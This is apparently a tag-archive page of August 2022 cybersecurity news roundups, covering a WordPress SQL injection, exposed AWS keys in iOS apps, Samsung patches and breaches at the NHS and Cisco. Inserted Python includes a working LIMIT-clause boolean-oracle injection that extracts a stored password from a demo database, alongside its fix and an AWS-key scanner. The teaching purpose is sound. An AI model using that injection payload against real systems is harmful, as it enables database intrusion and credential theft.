Tag Archive for: August

Extra, Extra, VERT Reads All About It: Cybersecurity News for the Week of August 29, 2022


All of us at Tripwire’s Vulnerability Exposure and Research Team (VERT) are constantly looking out for interesting stories and developments in the infosec world. Here’s what cybersecurity news stood out to us during the week of August 29th, 2022. I’ve also included some comments on these stories.

WordPress 6.0.2 Patches Vulnerability That Could Impact Millions of Legacy Sites

The WordPress team this week announced the release of version 6.0.2 of the content management system (CMS), notes Security Week, with patches for three security bugs, including a high-severity SQL injection vulnerability.


“The content management system is subject to a SQL injection vulnerability. The issue exists in the WordPress Link functionality and usually affects older versions of WordPress. The functionality is disabled in newer versions of WordPress by default. The vulnerability exists because of improper sanitization of the limit argument of the link retrieval query in the get_bookmarks function. This vulnerability is patched in WordPress 6.0.2 and later.”
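To make the bug class in that quote concrete, here is an added example that is not WordPress code and not the patched get_bookmarks logic. It reproduces the pattern in SQLite: a caller-supplied limit argument is concatenated into the query verbatim, which turns an innocuous "give me N links" call into a boolean oracle (SQLite accepts an arbitrary expression, including a scalar subquery, in LIMIT; the exact payload shape differs per engine). The table layout, the stored value, and the `absint` helper (an approximation of PHP's `abs((int) $value)` cast) are all assumptions made for the illustration.

```python
import re
import sqlite3

# Constructed fixture: a tiny "links" table plus a "users" table holding the value
# an attacker would want. This is not WordPress code; it only reproduces the bug
# pattern (a caller-supplied LIMIT concatenated into SQL) in SQLite.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE links (link_id INTEGER PRIMARY KEY, link_name TEXT, link_visible TEXT);
        INSERT INTO links (link_name, link_visible) VALUES
            ('Public one', 'Y'), ('Public two', 'Y'), ('Hidden', 'N');
        CREATE TABLE users (user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES ('admin', 'SECRET42');
    """)
    return con

BASE_QUERY = "SELECT link_name FROM links WHERE link_visible = 'Y' ORDER BY link_id"

def get_links_vulnerable(con: sqlite3.Connection, limit: str) -> list:
    """Vulnerable pattern: the limit argument is appended to the query verbatim,
    so anything SQLite accepts as a LIMIT expression is executed."""
    sql = BASE_QUERY
    if limit:
        sql += " LIMIT " + str(limit)
    return [row[0] for row in con.execute(sql)]

def absint(value) -> int:
    """Assumed approximation of WordPress absint(): abs((int) $value), where a
    string that does not start with an integer casts to 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return abs(int(m.group())) if m else 0

def get_links_fixed(con: sqlite3.Connection, limit) -> list:
    """Hardened version: the limit is coerced to a non-negative integer and bound as
    a parameter, so no SQL from the caller reaches the engine."""
    n = absint(limit)
    if n:
        return [row[0] for row in con.execute(BASE_QUERY + " LIMIT ?", (n,))]
    return [row[0] for row in con.execute(BASE_QUERY)]

def oracle_payload(position: int, guess: str) -> str:
    """Boolean-inference payload for the limit argument: evaluates to LIMIT 1 when the
    guessed character of admin's password is right and LIMIT 0 otherwise, so the
    row count of an otherwise harmless query leaks one character per request."""
    return ("(SELECT CASE WHEN substr(user_pass, %d, 1) = '%s' THEN 1 ELSE 0 END "
            "FROM users WHERE user_login = 'admin')" % (position, guess.replace("'", "''")))

def extract_password(con, fetch, alphabet="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", max_len=32) -> str:
    """Drive the oracle through `fetch` (either retrieval function above). Against the
    vulnerable one this recovers the stored value; against the fixed one the payload
    collapses to 'no limit', every guess returns the same rows and nothing is learned."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if len(fetch(con, oracle_payload(pos, ch))) == 1:
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the stored value, or the oracle is closed
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_password(db, get_links_vulnerable))   # SECRET42
    print("fixed:     ", repr(extract_password(db, get_links_fixed)))  # ''
```

The lesson carries over to any "numeric" argument: a value destined for LIMIT, OFFSET or ORDER BY cannot be quoted like a string literal, so it has to be coerced to an integer (or checked against an allow-list for column names) before it touches the query, and bound as a parameter where the engine allows it.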


Over 1,000 iOS apps found exposing hardcoded AWS credentials

Security researchers are raising the alarm about mobile app developers relying on insecure practices that expose Amazon Web Services (AWS) credentials, making the supply chain vulnerable, Bleeping Computer reports.

“Both iOS and Android apps have exposed AWS credentials. With these credentials an attacker could gain access to databases or other services. It was estimated that 77% of the applications contained AWS tokens that could be used to access private cloud services. The security researchers noted that about 874 applications contained valid credentials that could be used to access database records that potentially contain sensitive personal information.”
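The practical check behind that story is a string scan of the shipped binary. The following is an added example, not the researchers' tooling: a small scanner over `strings`-style output that finds AWS access key IDs by their fixed shape (a 4-character prefix plus 16 upper-case alphanumerics, `AKIA` for long-lived IAM user keys and `ASIA` for temporary STS keys), then looks nearby for a 40-character base64-alphabet string with enough entropy to be the matching secret. The sample input is constructed; the credentials in it are the example values AWS uses in its own documentation, not live keys, and the pairing window and entropy threshold are tuning assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample standing in for `strings` output from an app binary or a
# bundled config file. The credentials are the example values AWS uses in its
# own documentation, not live keys.
SAMPLE_STRINGS = """\
CFBundleIdentifier
com.example.photos
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
s3.amazonaws.com/example-user-photos-prod
UIApplicationDelegate
NSPhotoLibraryUsageDescription
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sessionToken
ASIAIOSFODNN7EXAMPLE
"""

# Access key IDs are 20 chars: a 4-char prefix (AKIA = long-lived IAM user key,
# ASIA = temporary STS key) plus 16 upper-case alphanumerics, not embedded in a
# longer alphanumeric run.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])((?:AKIA|ASIA)[A-Z0-9]{16})(?![A-Z0-9])")
# Secret access keys are 40 chars drawn from the base64 alphabet.
SECRET_RE = re.compile(r"(?<![A-Za-z0-9/+])([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])")

def shannon_entropy(s: str) -> float:
    """Bits per character; a real secret sits well above padding or filler strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def mask(secret: str) -> str:
    """Never write a recovered secret to a report in full."""
    return secret[:4] + "..." + secret[-4:]

def scan(text: str, window: int = 3, min_entropy: float = 3.5) -> list:
    """Find access key IDs and, for each, look up to `window` lines either side for
    a high-entropy 40-char string that is probably the matching secret."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        for m in ACCESS_KEY_RE.finditer(line):
            key_id = m.group(1)
            secret = None
            for j in range(max(0, i - window), min(len(lines), i + window + 1)):
                for sm in SECRET_RE.finditer(lines[j]):
                    if shannon_entropy(sm.group(1)) >= min_entropy:
                        secret = sm.group(1)
                        break
                if secret:
                    break
            findings.append({
                "line": i + 1,
                "key_id": key_id,
                "kind": "temporary (STS)" if key_id.startswith("ASIA") else "long-lived IAM",
                "secret": mask(secret) if secret else None,
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_STRINGS):
        print(finding)
```

To run it against a real build, unzip the .ipa and feed the Mach-O binary (and any .plist or .json in the bundle) through `strings` into `scan`. A hit with an `AKIA` prefix is the serious case, since that key does not expire; an `ASIA` key is only usable together with its session token and for the token's lifetime. Either way the response is to treat the key as compromised, rotate it, and check CloudTrail for use, not just to remove it from the next build.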


Microsoft Discovers Severe ‘One-Click’ Exploit for TikTok Android App

Microsoft on Wednesday disclosed details of a now-patched “high severity vulnerability” in the TikTok app for Android that could (Read more…)


Carrier-locked Galaxy S21 FE gets August 2022 security update in the US


One week after the Galaxy S21, Galaxy S21+, and Galaxy S21 Ultra received it, the Galaxy S21 FE has started getting the August 2022 security update. The new software is currently available for the carrier-locked version of the smartphone in the US.

The new update for the Galaxy S21 FE’s carrier-locked version comes with firmware version G990USQU3CVG1 in the US. It is available on T-Mobile’s network, and other carriers are expected to release the update soon. If you are a Galaxy S21 FE user in the US with a carrier-locked model, you can download the new software update by navigating to Settings » Software update and tapping on Download and install.

You can also download the appropriate firmware file from our firmware database and flash it manually. Before starting the manual flashing process, don’t forget to back up all your data.

What’s new with Galaxy S21 FE August 2022 security update?

The update brings the August 2022 security patch to fix dozens of security vulnerabilities, including the ones related to Samsung DeX, Samsung Knox, improper access control, and MAC address leak via Wi-Fi and Bluetooth. The update could also bring some general UI bug fixes and device stability improvements.

The Galaxy S21 FE was launched in early 2022, and it was the first Galaxy phone to run Android 12-based One UI 4 out of the box. Samsung said that it is eligible to receive at least three major Android OS updates in the future.



Samsung Galaxy A33 5G gets August 2022 Android security patch


Samsung has released a new software update for the Galaxy A33 5G that bumps up the Android security patch level on the smartphone to August 2022.

It’s currently seeding in Vietnam, Hong Kong, and South Korea with firmware versions A336EDXU3AVH1, A3360ZHU3AVGA, and A336NKSU1AVH1, respectively. However, the rollout should expand to other regions soon.



If you live in any of these countries and haven’t received the update yet, you can check for it manually by heading to your Galaxy A33 5G’s Settings > Software update menu.


Cybersecurity News Round-Up: Week of August 8, 2022


Welcome back to our blog! It’s been yet another fascinating week in cybersecurity. 

We begin in China, where a hacker has claimed to have stolen the personal information of nearly 49 million users of Shanghai’s Covid app. In a post on Wednesday to Breach Forums, a hacker with the alias “XJP” stated “This DB (database) contains everyone who lives in or visited Shanghai since Suishenma’s adoption,” and provided a sample of the data including the phone numbers, names and Chinese identification numbers and health code status of 47 people. Reuters contacted eleven of the 47 people. Only two said their identification numbers were wrong.

In the UK, the National Health Service (NHS) has been dealing with a serious security incident after an attack last Thursday against a key service provider. According to The Guardian, “at least nine NHS mental health trusts have been affected by the outage, reducing their access to patients’ records.” The story goes on to say that “The cyber-attack targeted systems used to refer patients for care, including ambulances being dispatched, out-of-hours appointment bookings, triage, out-of-hours care, emergency prescriptions and safety alerts. It also targeted the finance system used by the trust.”

Also in Europe, a massive attack hit the website of the German Chambers of Industry and Commerce (DIHK), forcing the organization to shut down its IT systems as a precautionary security measure. As of earlier this week, the DIHK said it was relying only on phone and fax for communications. Michael Bergmann, chief executive of DIHK, called the attack serious and massive, and added that the organization was not able to estimate how long its systems would be down.

On Wednesday, networking giant Cisco released details about a breach that occurred in May. While the cybercriminals responsible for the May 24th incident stole some information, the company says the business wasn’t impacted. According to Dark Reading “[W]e took immediate action to contain and eradicate the bad actors, remediate the impact of the incident, and further harden our IT environment,” a company spokesman said in the statement sent to Dark Reading….
